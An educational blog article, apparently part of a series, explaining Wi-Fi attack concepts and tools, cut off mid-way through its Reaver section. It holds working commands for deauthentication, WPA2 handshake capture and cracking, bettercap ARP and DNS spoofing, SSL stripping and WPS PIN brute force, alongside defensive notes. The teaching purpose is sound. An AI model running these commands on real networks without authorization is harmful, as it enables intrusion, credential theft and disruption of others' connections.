Every concept, every tool, and every piece of hardware a wireless attacker uses — explained from scratch so you actually understand what you're doing
Series Overview
Part I — The Signal Never Lies → Foundation, protocols, how Wi-Fi actually works.
Part II — The Attacker's Arsenal → Current Article: Attack concepts, tools, hardware you need.
Part III — Break In, Own Everything → Live lab simulation, post-exploitation, real-world scenarios.
Part IV — Lock It Down or Lose It All → Defense, detection, incident response, the future of wireless security.
⚠️ Legal Disclaimer: This series is written strictly for cybersecurity education, ethical hacking training, and authorized penetration testing. Every technique and tool described in this blog must only be used on networks you own or have explicit written authorization to test. Unauthorized wireless testing is a criminal offense in virtually every jurisdiction worldwide. The author bears zero responsibility for misuse of this information.
What This Part Covers
Part I gave you the foundation — how 802.11 works, what a four-way handshake actually is, why WEP collapsed like a house of cards, and why WPA3's SAE handshake fundamentally changes the attack surface. If you haven't read Part I, go back. Everything in this part assumes that foundation.
Part II is where things get concrete.
This is the attacker's playbook. We are going to walk through every core attack concept in wireless security — not just what it does, but how it works mechanically at the packet level. Then we will break down every major tool in the wireless security toolkit, explaining what each one is actually doing under the hood rather than just listing commands. And finally, we will cover the hardware side: why your laptop's built-in Wi-Fi card is useless for security work, which chipsets and adapters professionals actually use, and what to look for when buying equipment.
By the end of Part II, you will understand the full picture from the attacker's perspective — the concepts, the tools, and the hardware that make wireless attacks possible. Part III takes all of this and runs it live in a lab.
Section 1: Core Attack Concepts
Before you touch a tool, you need to understand the building blocks. Every wireless attack is a combination of these core concepts. Master them here, and every tool will make immediate sense.
Concept 1: Monitor Mode — Becoming an Invisible Observer
This is where everything starts.
Your Wi-Fi adapter, by default, operates in what is called managed mode. In managed mode, your network card has one job: connect to your home or office network and transfer your data. It ignores every other packet floating through the air around it. Packets addressed to other devices? Discarded at the driver level before your operating system even sees them. Traffic from other networks? Never reaches you. It is like sitting in a crowded café and choosing to only listen to the one person you are talking to, filtering out everything else.
Monitor mode removes that filter entirely.
In monitor mode, your wireless adapter captures every single 802.11 frame it receives — regardless of destination MAC address, regardless of SSID, regardless of whether the network is encrypted or not, regardless of whether you are connected to anything. Your adapter becomes a passive radio receiver, silently recording everything in the air on the channel it is tuned to.
┌─────────────────────────────────────────────────────────────────┐
│ MANAGED MODE vs MONITOR MODE │
├────────────────────────────┬────────────────────────────────────┤
│ MANAGED MODE │ MONITOR MODE │
│ (Normal Operation) │ (Security Testing) │
├────────────────────────────┼────────────────────────────────────┤
│ ✓ Connected to 1 network │ ✓ Not connected to any network │
│ ✗ Only sees own traffic │ ✓ Captures ALL nearby 802.11 frames│
│ ✗ Ignores other networks │ ✓ Sees all SSIDs and BSSIDs │
│ ✗ Cannot inject packets │ ✓ Can inject packets (with driver) │
│ ✓ Normal apps work fine │ ✗ Cannot browse internet normally │
│ ✗ Cannot capture handshake │ ✓ Captures WPA2 handshakes │
│ ✗ No beacon analysis │ ✓ Full management frame access │
└────────────────────────────┴────────────────────────────────────┘
Monitor mode is the foundation of every passive wireless attack. Handshake capture? You need monitor mode. Scanning for rogue access points? Monitor mode. Seeing which devices are probing for which networks? Monitor mode. Without it, you are operating blind.
One important point that trips up beginners: monitor mode is a driver and chipset feature, not a universal capability. Most built-in laptop Wi-Fi adapters do not support monitor mode in their standard drivers. This is why specialized external adapters are required — we cover this in detail in Section 3.
Concept 2: Packet Injection — Speaking the Network's Language
Monitor mode lets you listen. Packet injection lets you talk — but not in the normal way.
Standard Wi-Fi adapters in managed mode can only transmit packets that follow the normal 802.11 connection rules. You are associated to a network, and you send your traffic. Packet injection is different: it allows you to craft arbitrary 802.11 frames and inject them into the airspace, regardless of what network you are connected to, and without the frames needing to follow normal connection conventions.
This is what makes deauthentication attacks possible. You are not "connected" to the target network — you are injecting raw 802.11 management frames that the target devices will accept as legitimate, because those frames look exactly like frames from the real access point.
Not all adapters that support monitor mode also support packet injection. They are separate capabilities. Always test both with aireplay-ng -9 wlan0mon before assuming an adapter can perform active attacks.
Concept 3: Packet Sniffing — Reading the Air
Once you are in monitor mode, you are receiving every frame in range. Packet sniffing is the act of capturing and recording those frames for analysis.
On an open (unencrypted) network, sniffing is immediately devastating. Every HTTP request, DNS query, username, password, session cookie, and piece of form data transmitted without TLS is visible in plaintext. A coffee shop with an open guest network is a live demonstration of why "free Wi-Fi" without a VPN is a serious risk.
Open Network Sniffing — What an Attacker Sees
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Your device sends: Attacker captures:
────────────────── ──────────────────
GET /login HTTP/1.1 → username=john
Host: bank.com password=Secr3t!
Content: user=john&pass=Secr3t! session_token=eyJ0...
full request/responseOn an encrypted network (WPA2/WPA3), the payload of data frames is encrypted and unreadable without the key. But the attacker still captures:
- MAC addresses of every device communicating (always visible, never encrypted)
- SSID and BSSID of the network
- Traffic volume and timing — useful for behavioral analysis
- DNS queries if DNS is unencrypted (which it usually is by default)
- EAPOL handshake frames — the primary target for WPA2 cracking
- Probe requests — your device broadcasting the names of every saved Wi-Fi network
That last point is worth pausing on. When your phone has Wi-Fi on, it is constantly broadcasting probe requests on every channel asking "Is HomeNetwork here? Is CoffeeShop_WiFi here? Is CompanyOffice here?" Every network you have ever connected and saved is being advertised to anyone monitoring the airspace. This is a significant privacy leak — and it is happening right now, on your device, in every public space you enter.
Concept 4: The WPA2 Handshake Capture — The Attacker's Prize
We covered the four-way handshake in detail in Part I. From the attacker's perspective, here is what the capture objective looks like operationally:
The attacker needs to capture the four EAPOL frames that are exchanged when a client connects to the access point. These frames contain the cryptographic material needed for an offline dictionary attack: the ANonce, SNonce, and — most critically — the MIC (Message Integrity Code) that encodes proof of the correct password.
HANDSHAKE CAPTURE — ATTACKER'S VIEW
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
WHAT THE ATTACKER CAPTURES:
┌──────────────┐ EAPOL 1 ┌──────────────┐
│ Access Point │ ──────────> │ Client │ ← ANonce captured
│ (Target AP) │ │ (Victim) │
│ │ <────────── │ │ ← SNonce + MIC captured ★
│ │ EAPOL 2 │ │
│ │ ──────────> │ │ ← GTK captured
│ │ EAPOL 3 │ │
│ │ <────────── │ │ ← ACK captured
└──────────────┘ EAPOL 4 └──────────────┘
ATTACKER (monitoring in the background)
┌─────────────────────────────────┐
│ Silently captures all 4 frames │
│ Takes them offline │
│ Runs dictionary attack │
│ No further network contact │
└─────────────────────────────────┘
★ EAPOL 2 contains the MIC — this is the critical frame.
With EAPOL 1 + EAPOL 2, the attacker has everything needed
to crack the password offline.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Two methods to get this handshake:
Passive capture: Simply wait and monitor. When any client connects to the target AP (during normal business hours, this happens constantly), the handshake is captured automatically. No interaction with the network required. Zero footprint.
Active capture via deauthentication: Force a currently connected client to disconnect by sending spoofed Deauthentication frames. The client automatically reconnects within seconds, generating a fresh handshake. Leaves evidence of the Deauth attack, but is faster and works at any time of day. We cover this in the next concept.
Concept 5: The Deauthentication Attack — Pulling the Plug Remotely
This is one of the most important and widely used attack techniques in wireless security. It is also deceptively simple to understand once you remember one fact from Part I:
WPA2 management frames are not authenticated.
A Deauthentication frame is a management frame that either a client or an access point can send to formally terminate a connection. On a normal network, an AP sends a Deauth to a client when the client is being disconnected due to inactivity, a firmware restart, a configuration change, or similar reasons. The client sends one back when it is intentionally disconnecting (shutting down, switching networks).
Here is the attack: anyone can send a forged Deauthentication frame claiming to be from anyone. If you craft a Deauth frame with the AP's MAC address as the source and a client's MAC address as the destination, and inject it into the airspace — the client receives it, believes it is from the AP, and immediately disconnects. The client has absolutely no mechanism to verify whether that frame actually came from the AP.
DEAUTHENTICATION ATTACK FLOW
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
NORMAL SCENARIO: ATTACK SCENARIO:
[AP] ──(deauth)──> [Client] [ATTACKER] ──(FORGED deauth)──> [Client]
Source MAC = AP's BSSID (SPOOFED)
Client accepts it. Client cannot verify the source.
Session ends. Client accepts it. Session ends.
RESULT:
Client disconnects from legitimate AP.
Client automatically tries to reconnect.
Reconnection generates a fresh WPA2 handshake.
Attacker's airodump-ng captures the handshake.
USES:
① Capture WPA2 handshake (for offline cracking)
② Denial of service (send continuously)
③ Force clients onto attacker's Evil Twin AP
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━This attack is trivially executed with aireplay-ng and takes less than ten seconds from start to handshake capture when a client is present. The tool, the network, and the client do not need to know each other — just proximity and the right adapter.
Why WPA3 defeats this: WPA3 mandates Management Frame Protection (802.11w). Deauthentication frames must now be cryptographically signed by a party that holds the session key. A forged Deauth from an attacker who is not on the network carries no valid signature and is rejected by the receiving device.
Concept 6: Rogue Access Points — The Unauthorized Door
A rogue access point is any wireless AP that has not been authorized to operate on a network, appearing where it should not be.
There are two distinct categories with very different attack scenarios:
The Insider Rogue AP:
An employee plugs a cheap consumer router into a corporate network jack under their desk for personal convenience — maybe they want better Wi-Fi signal for their phone. That device is now broadcasting a wireless network connected directly to the internal corporate network. It may have WPS enabled with a default PIN. It may be using WPA2 with the default password written on the bottom of the router. It may have remote management enabled.
From outside the building, an attacker with a directional antenna scanning for Wi-Fi networks detects an AP with a consumer router SSID like "NETGEAR-2A4F" broadcasting from what is clearly a corporate building. This device was never provisioned by IT, never patched, never configured for security. It is an unauthorized door into the corporate network.
The External Attacker's Rogue AP:
An attacker deploys their own AP — a laptop running hostapd, or a dedicated hardware device — and connects it to the target network via a network drop or Ethernet port they have brief physical access to. This provides persistent wireless access to the internal network even after the attacker leaves the premises.
Both types are detected by enterprise WIDS/WIPS solutions (covered in Part IV) through constant monitoring for unauthorized BSSIDs on the corporate SSID or on wired network segments.
Concept 7: The Evil Twin Attack — The Wireless Impersonation
The Evil Twin is one of the most conceptually clean and practically effective attacks in wireless security. It requires no cryptography, no cracking, and it defeats WPA2 networks with arbitrarily strong passwords — because it attacks the human, not the protocol.
EVIL TWIN ATTACK — HOW IT WORKS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
LEGITIMATE NETWORK: ATTACKER'S EVIL TWIN:
┌─────────────────────┐ ┌─────────────────────┐
│ SSID: CorpWiFi │ │ SSID: CorpWiFi │ ← same name
│ BSSID: AA:BB:CC... │ │ BSSID: 11:22:33... │ ← different MAC
│ Channel: 6 │ │ Channel: 11 │ ← diff channel
│ Signal: Medium │ │ Signal: STRONG ★ │ ← boosted signal
└─────────────────────┘ └─────────────────────┘
★ Attacker boosts signal on Evil Twin OR sends deauth frames
to kick clients off the real AP.
VICTIM'S DEVICE:
"I know CorpWiFi. I see two of them. I'll pick the stronger one."
→ Connects to Evil Twin.
ATTACKER NOW:
① Presents fake "verify your Wi-Fi password" captive portal
② User enters WPA2 password (social engineering)
③ Attacker checks password against captured handshake
④ Password harvested. Attack complete.
OR (without social engineering):
① Victim is connected to Evil Twin
② Attacker performs MitM on all victim traffic
③ All HTTP traffic, DNS, credentials are captured in real time
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━The Evil Twin attack is particularly powerful in environments with multiple APs broadcasting the same SSID — which is exactly how enterprise Wi-Fi is designed. Users and devices are conditioned to connect to any AP broadcasting the right SSID, which is exactly what the Evil Twin exploits.
Tools like Fluxion (covered below) fully automate this attack, including the deauth component, the captive portal, and automatic password verification.
Concept 8: MAC Address Spoofing — Wearing Someone Else's Identity
Every 802.11 frame contains a source MAC address and a destination MAC address in the header. These are never encrypted — they are always visible in plaintext in every frame, even on WPA2 and WPA3 networks.
MAC addresses are 48-bit hardware identifiers assigned to every network interface. They are supposed to be globally unique, assigned by the manufacturer, and burned into the hardware. In reality, they are trivially changed in software on every major operating system:
# Linux — change MAC address to anything you want
sudo ip link set wlan0 down
sudo ip link set wlan0 address AA:BB:CC:DD:EE:FF
sudo ip link set wlan0 upThis takes two seconds and survives until the next reboot.
Why this matters for attackers:
Bypassing MAC filtering: Some networks use MAC address filtering — maintaining a whitelist of approved device MACs and rejecting all others. Since MAC addresses are always visible in 802.11 frames, an attacker monitors the target network, identifies an authorized device's MAC, waits for that device to disconnect, then spoofs its MAC and connects. MAC filtering provides zero meaningful security against any attacker with basic tools.
Spoofing management frames: When the attacker sends deauthentication frames, they set the source MAC to the AP's BSSID. The receiving client sees a frame that appears to originate from its own access point. Without management frame protection, the client cannot distinguish a real Deauth from a spoofed one.
Anonymizing the attacker: Running airodump-ng for passive reconnaissance leaves no footprint, but active attacks (packet injection) do transmit frames with source MAC addresses. Spoofing the attacker's MAC to a random value or to a legitimate device's MAC complicates attribution.
Concept 9: Signal Jamming — The Nuclear Option
RF jamming broadcasts strong interference on the same frequencies used by Wi-Fi, drowning out legitimate communications and creating a denial of service at the physical layer. Devices within range cannot communicate through the noise.
We mention this concept for completeness, but with a very firm note:
RF jamming is illegal in virtually every jurisdiction, with no exceptions for testing on your own networks. In the US, the FCC prohibits jamming under 47 U.S.C. § 333, period. No "but it's my own network" exception exists. The fines are significant and the FCC actively investigates jamming complaints.
Legitimate security testing does not involve RF jamming. If a security assessment requires demonstrating denial of service against a wireless network, that is documented and achieved via software-layer deauthentication floods, not hardware jammers.
Section 2: The Complete Wireless Attack Tool Arsenal
Understanding the concepts is the foundation. Now let's walk through the tools that implement those concepts. For each tool, we cover what it does, how it works internally, and when you use it.
Tool 1: The Aircrack-ng Suite — The Complete Wireless Audit Toolkit
Aircrack-ng is not a single program. It is a suite of four core tools (and several supporting utilities) that together cover the entire wireless attack workflow: enabling monitor mode, scanning and capturing, injecting frames, and cracking passwords. It is the foundation of wireless security work on Linux.
Every tool in the suite operates on a monitor-mode wireless interface (wlan0mon by convention).
airmon-ng — The Mode Switcher
airmon-ng manages the wireless adapter's operating mode. Its job is to convert your adapter from managed mode (normal) to monitor mode (security testing) and back.
AIRMON-NG WORKFLOW
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Step 1: Kill interfering processes
────────────────────────────────────
$ sudo airmon-ng check kill
WHY: NetworkManager and wpa_supplicant hold exclusive
control of wireless interfaces. They must be stopped
before monitor mode can be enabled.
WHAT GETS KILLED: NetworkManager, wpa_supplicant,
dhclient, and any other process holding the interface.
Your machine loses its internet connection temporarily.
Step 2: Enable monitor mode
────────────────────────────────────
$ sudo airmon-ng start wlan0
OUTPUT:
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros AR9271
(mac80211 monitor mode vif enabled for [phy0]wlan0
on [phy0]wlan0mon)
RESULT: A new virtual interface wlan0mon is created
in monitor mode. The original wlan0 may disappear
or become inactive.
Step 3: Verify
────────────────────────────────────
$ iwconfig wlan0mon
wlan0mon IEEE 802.11 Mode:Monitor ...
Step 4: When finished, restore normal operation
────────────────────────────────────
$ sudo airmon-ng stop wlan0mon
$ sudo systemctl start NetworkManager
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Under the hood: airmon-ng calls the iw and ip Linux utilities to reconfigure the wireless interface's mode via the mac80211 kernel subsystem. The new wlan0mon interface is a virtual monitor-mode interface layered on top of the physical hardware interface. All subsequent tools in the suite write to and read from this virtual interface.
airodump-ng — The Eyes and Ears
airodump-ng is the most commonly used tool in the suite. It is a wireless packet capture and network scanner. When you want to know what networks exist, what clients are connected to them, and you want to capture handshakes — this is the tool.
AIRODUMP-NG OUTPUT EXPLAINED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
$ sudo airodump-ng wlan0mon
CH 7 ][ Elapsed: 24 s ][ 2024-09-15 14:32 ][ WPA handshake: AA:BB:CC:DD:EE:FF
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -45 487 234 12 6 130 WPA2 CCMP PSK CorpWiFi
11:22:33:44:55:66 -72 103 0 0 11 54 WPA2 CCMP PSK HomeNetwork
77:88:99:AA:BB:CC -81 89 0 0 1 130 OPN GuestWiFi
BSSID STATION PWR Rate Lost Frames Notes Probes
AA:BB:CC:DD:EE:FF DE:AD:BE:EF:CA:FE -52 54-54 0 876 CorpWiFi
(not associated) 12:34:56:78:9A:BC -65 0- 1 0 14 HomeNetwork,CoffeeShop
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
COLUMN GUIDE:
BSSID → Access point MAC address
PWR → Signal strength in dBm (closer to 0 = stronger)
#Data → Number of data frames captured (higher = more traffic)
CH → Operating channel
ENC → Encryption (WPA2, WPA, WEP, OPN = open)
CIPHER → CCMP (AES) or TKIP (RC4)
AUTH → PSK (personal) or MGT (enterprise/802.1X)
ESSID → Network name (SSID)
STATION section shows connected clients.
"not associated" clients are probing for saved networks.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Targeted capture mode — locking to one specific network:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# -c 6 → lock to channel 6 (no more channel hopping)
# --bssid → filter to only this access point
# -w capture → write to files: capture-01.cap (raw frames)
# capture-01.csv (summary)
# capture-01.kismet.csvWhen a WPA2 four-way handshake is captured, the top-right corner of the display updates to:
WPA handshake: AA:BB:CC:DD:EE:FF
This is the green light. The capture file now contains everything needed for offline cracking.
What airodump-ng does internally: It puts the adapter into receive-only mode on the specified channel and reads every raw 802.11 frame via the pcap library, filtering by BSSID if specified. EAPOL frames (the WPA handshake) are identified by EtherType 0x888E and stored separately for the cracking workflow. Management frames are decoded and displayed in the UI.
aireplay-ng — The Injector
aireplay-ng is the active attack tool. Where airodump-ng only listens, aireplay-ng injects 802.11 frames. Its most important capability for WPA2 testing is the deauthentication attack.
AIREPLAY-NG ATTACK MODES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ATTACK 0: Deauthentication (most commonly used)
──────────────────────────────────────────────────
$ sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c DE:AD:BE:EF:CA:FE wlan0mon
-0 5 → send 5 deauth frames
-a AA:BB:... → target AP BSSID
-c DE:AD:... → target client MAC (omit to deauth ALL clients)
WHAT HAPPENS: 5 Deauth frames are injected with source=AP BSSID,
dest=Client MAC. Client disconnects and reconnects. Handshake captured.
ATTACK 1: Fake Authentication
──────────────────────────────────────────────────
$ sudo aireplay-ng -1 0 -e TargetSSID -a AA:BB:CC:DD:EE:FF wlan0mon
Associates attacker's adapter with the target AP.
Required for WEP ARP replay attacks.
Tells the AP "I'm a client so accept my injected packets."
ATTACK 3: ARP Request Replay (WEP only)
──────────────────────────────────────────────────
$ sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon
Captures ARP packets and replays them to generate
new IVs rapidly. Used to accelerate WEP cracking.
Generates 100,000+ IVs per minute on active networks.
ATTACK 9: Injection Test
──────────────────────────────────────────────────
$ sudo aireplay-ng -9 wlan0mon
Tests whether adapter supports packet injection.
ALWAYS run this before active attacks to confirm
your hardware is working.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Under the hood: aireplay-ng crafts raw 802.11 frames using libpcap and injects them via the wireless driver's raw injection API. For deauthentication, it builds an 802.11 management frame with:
- Frame Control: Type=0 (Management), Subtype=12 (Deauthentication)
- Address 1 (destination): Client MAC
- Address 2 (source): AP BSSID (spoofed)
- Address 3 (BSSID): AP BSSID
- Reason Code: 7 (Class 3 frame received from nonassociated STA)
The reason code is present but the receiving device does not verify that the reason code is legitimate or that the source actually sent it.
aircrack-ng — The Cracking Engine
aircrack-ng is the final stage of the WPA2 attack workflow. It takes the captured handshake file and a wordlist and performs an offline dictionary attack.
AIRCRACK-NG WPA2 CRACKING
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
$ sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt \
-b AA:BB:CC:DD:EE:FF \
capture-01.cap
-w → wordlist file path
-b → BSSID of target AP (to select correct handshake)
capture-01.cap → packet capture containing handshake
OUTPUT (in progress):
[00:01:42] 1,847,293 keys tested (18,234.12 k/s)
Current passphrase: password12
OUTPUT (success):
KEY FOUND! [ CompanyWiFi2024 ]
Master Key : A1 B2 C3 D4 E5 F6 ...
Transient Key : 11 22 33 44 55 66 ...
EAPOL HMAC : AA BB CC DD ...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
WHAT AIRCRACK DOES FOR EACH CANDIDATE PASSWORD:
1. PMK = PBKDF2(HMAC-SHA1, candidate, SSID, 4096, 256)
2. PTK = PRF-512(PMK, nonces, MAC addresses)
3. MIC = HMAC(KCK extracted from PTK, EAPOL_frame_data)
4. Compare computed MIC with MIC captured in handshake
5. Match → password found. No match → next word.
SPEED REALITY CHECK:
aircrack-ng (CPU only) ≈ 1,000 – 8,000 keys/second
For 14 million word rockyou.txt: 30 minutes worst case
Against passwords NOT in any wordlist: never succeeds
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━aircrack-ng for WEP uses a completely different algorithm. It performs the statistical PTW/FMS/Korek attacks against collected IVs. Given ~85,000 data frames (achievable in minutes on any active WEP network), it recovers the WEP key in under ten seconds.
Tool 2: Hashcat — GPU-Accelerated Cracking
aircrack-ng runs on the CPU and is relatively slow for WPA2 cracking. Hashcat runs on the GPU, taking advantage of the massively parallel architecture of modern graphics cards to test candidates orders of magnitude faster.
SPEED COMPARISON: CPU vs GPU (WPA2 cracking)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Hardware │ Keys/Second
──────────────────────────────┼─────────────────
CPU (aircrack-ng) │ ~1,000 – 8,000
Mid-range GPU (RTX 3060) │ ~400,000
High-end GPU (RTX 4090) │ ~1,200,000
4× RTX 4090 rig │ ~4,800,000
Cloud GPU cluster (8× A100) │ ~8,000,000+
REALITY CHECK:
At 1,200,000 keys/sec against rockyou.txt (14M words):
→ 14,000,000 ÷ 1,200,000 = ~12 seconds to test the entire list
At 1,200,000 keys/sec against 8-character lowercase brute force:
→ 26^8 = 208 billion combinations
→ 208,000,000,000 ÷ 1,200,000 ≈ 48 hours
→ A 12-char random password: millions of years
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Using Hashcat for WPA2:
# Step 1: Convert capture file to Hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.pcapng
# Step 2: Run dictionary attack
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Step 3: Add mutation rules (dramatically improves coverage)
hashcat -m 22000 hash.hc22000 rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Step 4: Targeted brute force with a mask
# Test all 8-char combos: lowercase + digits
hashcat -m 22000 hash.hc22000 -a 3 ?l?l?l?l?d?d?d?d
# -m 22000 → hash type (WPA2-PMKID/EAPOL combined format)
# -a 3 → brute force mode
# ?l → any lowercase letter
# ?d → any digitHashcat attack modes — explained simply:
HASHCAT ATTACK MODES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
MODE 0 — Straight Dictionary
Tests each word from the wordlist exactly as-is.
Fast. Good for common passwords in the list.
Misses: "Password1" if wordlist has "password1"
MODE 1 — Combination
Joins every word from List A with every word from List B.
Example: "dog" + "2024" → tests "dog2024"
Good for: pattern-based passwords
MODE 3 — Brute Force with Mask
Tests every possible combination of defined character sets.
?u = uppercase, ?l = lowercase, ?d = digit, ?s = symbol
Example: -a 3 ?u?l?l?l?d?d → "Pass12", "Word99"
Slow for long passwords. Effective for short, structured ones.
MODE 6 — Hybrid: Dictionary + Mask
Every word from list, combined with a suffix mask.
Example: "password" + "?d?d?d?d" → "password2024"
Extremely effective for human-chosen passwords.
RULES (most powerful method)
Apply transformation rules to every dictionary word.
Rules include: capitalize first letter, append a year,
leet substitutions (a→@, e→3), reverse, duplicate, etc.
best64.rule + rockyou.txt = billions of realistic candidates
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Tool 3: Wireshark — The Protocol Microscope
Wireshark is the world's most widely used network protocol analyzer. Where airodump-ng is a blunt capture instrument, Wireshark is a microscope. You use it after capture to examine the exact structure and content of specific frames.
WIRESHARK DISPLAY FILTERS FOR WIRELESS WORK
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
FILTER │ SHOWS
────────────────────────────────────┼──────────────────────────
wlan.fc.type_subtype == 0x08 │ Beacon frames only
wlan.fc.type_subtype == 0x04 │ Probe Request frames
wlan.fc.type_subtype == 0x05 │ Probe Response frames
wlan.fc.type_subtype == 0x0c │ Deauthentication frames
wlan.fc.type_subtype == 0x0a │ Disassociation frames
eapol │ WPA handshake frames only
wlan.bssid == AA:BB:CC:DD:EE:FF │ Only target AP traffic
wlan.sa == 11:22:33:44:55:66 │ Only specific client traffic
wlan.fc.type_subtype == 0x08 && │ Beacons with hidden SSID
wlan.ssid == "" │ (length 0 = hidden)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Key uses in wireless security work:
Handshake verification: Before spending hours cracking, verify the capture file actually contains a valid, complete handshake. Filter by eapol and check that you see at least EAPOL messages 1 and 2 (ideally all four). An incomplete handshake will never crack successfully.
Rogue AP investigation: Filter beacon frames and look for unexpected BSSIDs broadcasting your organization's SSID. Examine the RSN IE (Robust Security Network Information Element) in the beacon to see the advertised security capabilities.
Deauth attack evidence: In a forensic context, filter wlan.fc.type_subtype == 0x0c and look for unusual volumes of Deauthentication frames — this is a clear indicator of an active attack.
Probe request analysis: Filter wlan.fc.type_subtype == 0x04 to see all probe requests and identify which devices are searching for which saved networks.
Wireshark can display monitor mode capture files from airodump-ng or from a live monitor mode interface directly. For analysis of existing capture files, always use Wireshark rather than airodump-ng.
Tool 4: Bettercap — The Post-Access Swiss Army Knife
Bettercap is where wireless attacks end and post-access attacks begin. Once you are on a network — either through a cracked WPA2 password or through an Evil Twin — Bettercap handles everything that happens next.
It operates as a unified framework with modules for different attack capabilities:
BETTERCAP CORE MODULES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
wifi module
wifi.recon on → scan for nearby APs and clients
wifi.deauth [bssid] → send deauth to AP or specific client
wifi.show → display all discovered networks
arp.spoof (Man-in-the-Middle positioning)
set arp.spoof.targets 192.168.1.50 → target specific victim
arp.spoof on → begin poisoning
WHAT HAPPENS: Bettercap sends fake ARP replies to the victim
("192.168.1.1 is at MY MAC") and to the router ("192.168.1.50
is at MY MAC"). All traffic between victim and router now flows
through the attacker's machine.
net.sniff (Traffic capture and analysis)
net.sniff on → capture and display all passing traffic
set net.sniff.verbose true → show full HTTP data
With arp.spoof active, this captures all unencrypted victim traffic.
dns.spoof (DNS hijacking)
set dns.spoof.domains bank.com, google.com
set dns.spoof.address 192.168.1.99 → attacker's server IP
dns.spoof on
Any DNS query for targeted domains returns attacker's IP.
Victim's browser goes to attacker's server instead.
https.proxy (SSL stripping)
https.proxy on
Attempts to downgrade HTTPS connections to HTTP
for sites without HSTS properly configured.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Running Bettercap:
sudo bettercap -iface wlan0mon # launch on wireless interface
# Bettercap opens an interactive REPL (Read-Eval-Print Loop)
# Commands are entered interactively:
>> help # list all modules
>> wifi.recon on # begin wireless scanning
>> wifi.show # display discovered networks
>> arp.spoof on # begin ARP poisoning (after connecting)Bettercap is particularly powerful because it combines wireless reconnaissance, active attacks, and post-connection exploitation in a single unified tool. Many red team workflows use airodump-ng for initial capture and Bettercap for everything after network access is gained.
Tool 5: Reaver — Exploiting the WPS Vulnerability
Reaver targets WPS (Wi-Fi Protected Setup), a feature designed to make connecting devices to Wi-Fi easier by using an 8-digit PIN instead of the full password.
The WPS PIN vulnerability is elegant in its simplicity: the 8-digit PIN is validated in two separate halves. The router validates the first 4 digits, and only if they are correct does it validate the last 3 (the 8th digit is a checksum). This splits the attack:
WPS PIN ATTACK — WHY IT WORKS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
FULL 8-DIGIT PIN:
Possible combinations: 10^8 = 100,000,000
At 1 attempt/second: 100,000,000 seconds ≈ 3 years
ACTUAL VALIDATION STRUCTURE:
PIN is validated in TWO halves:
[1234] [5670] ← last digit is always a checksum
↓ ↓
10^4 = 10,000 10^3 = 1,000 (last digit auto-computed)
First half: max 10,000 attempts
Second half: max 1,000 attempts
TOTAL: max 11,000 attempts
At 1 attempt/second: ≈ 3 hours
RESULT: Once PIN is found → WPA passphrase is retrieved.
WPA passphrase can be 63 random characters.
Doesn't matter. Reaver gets it from the PIN, not the password.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Basic Reaver usage
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# With delay to avoid lockout
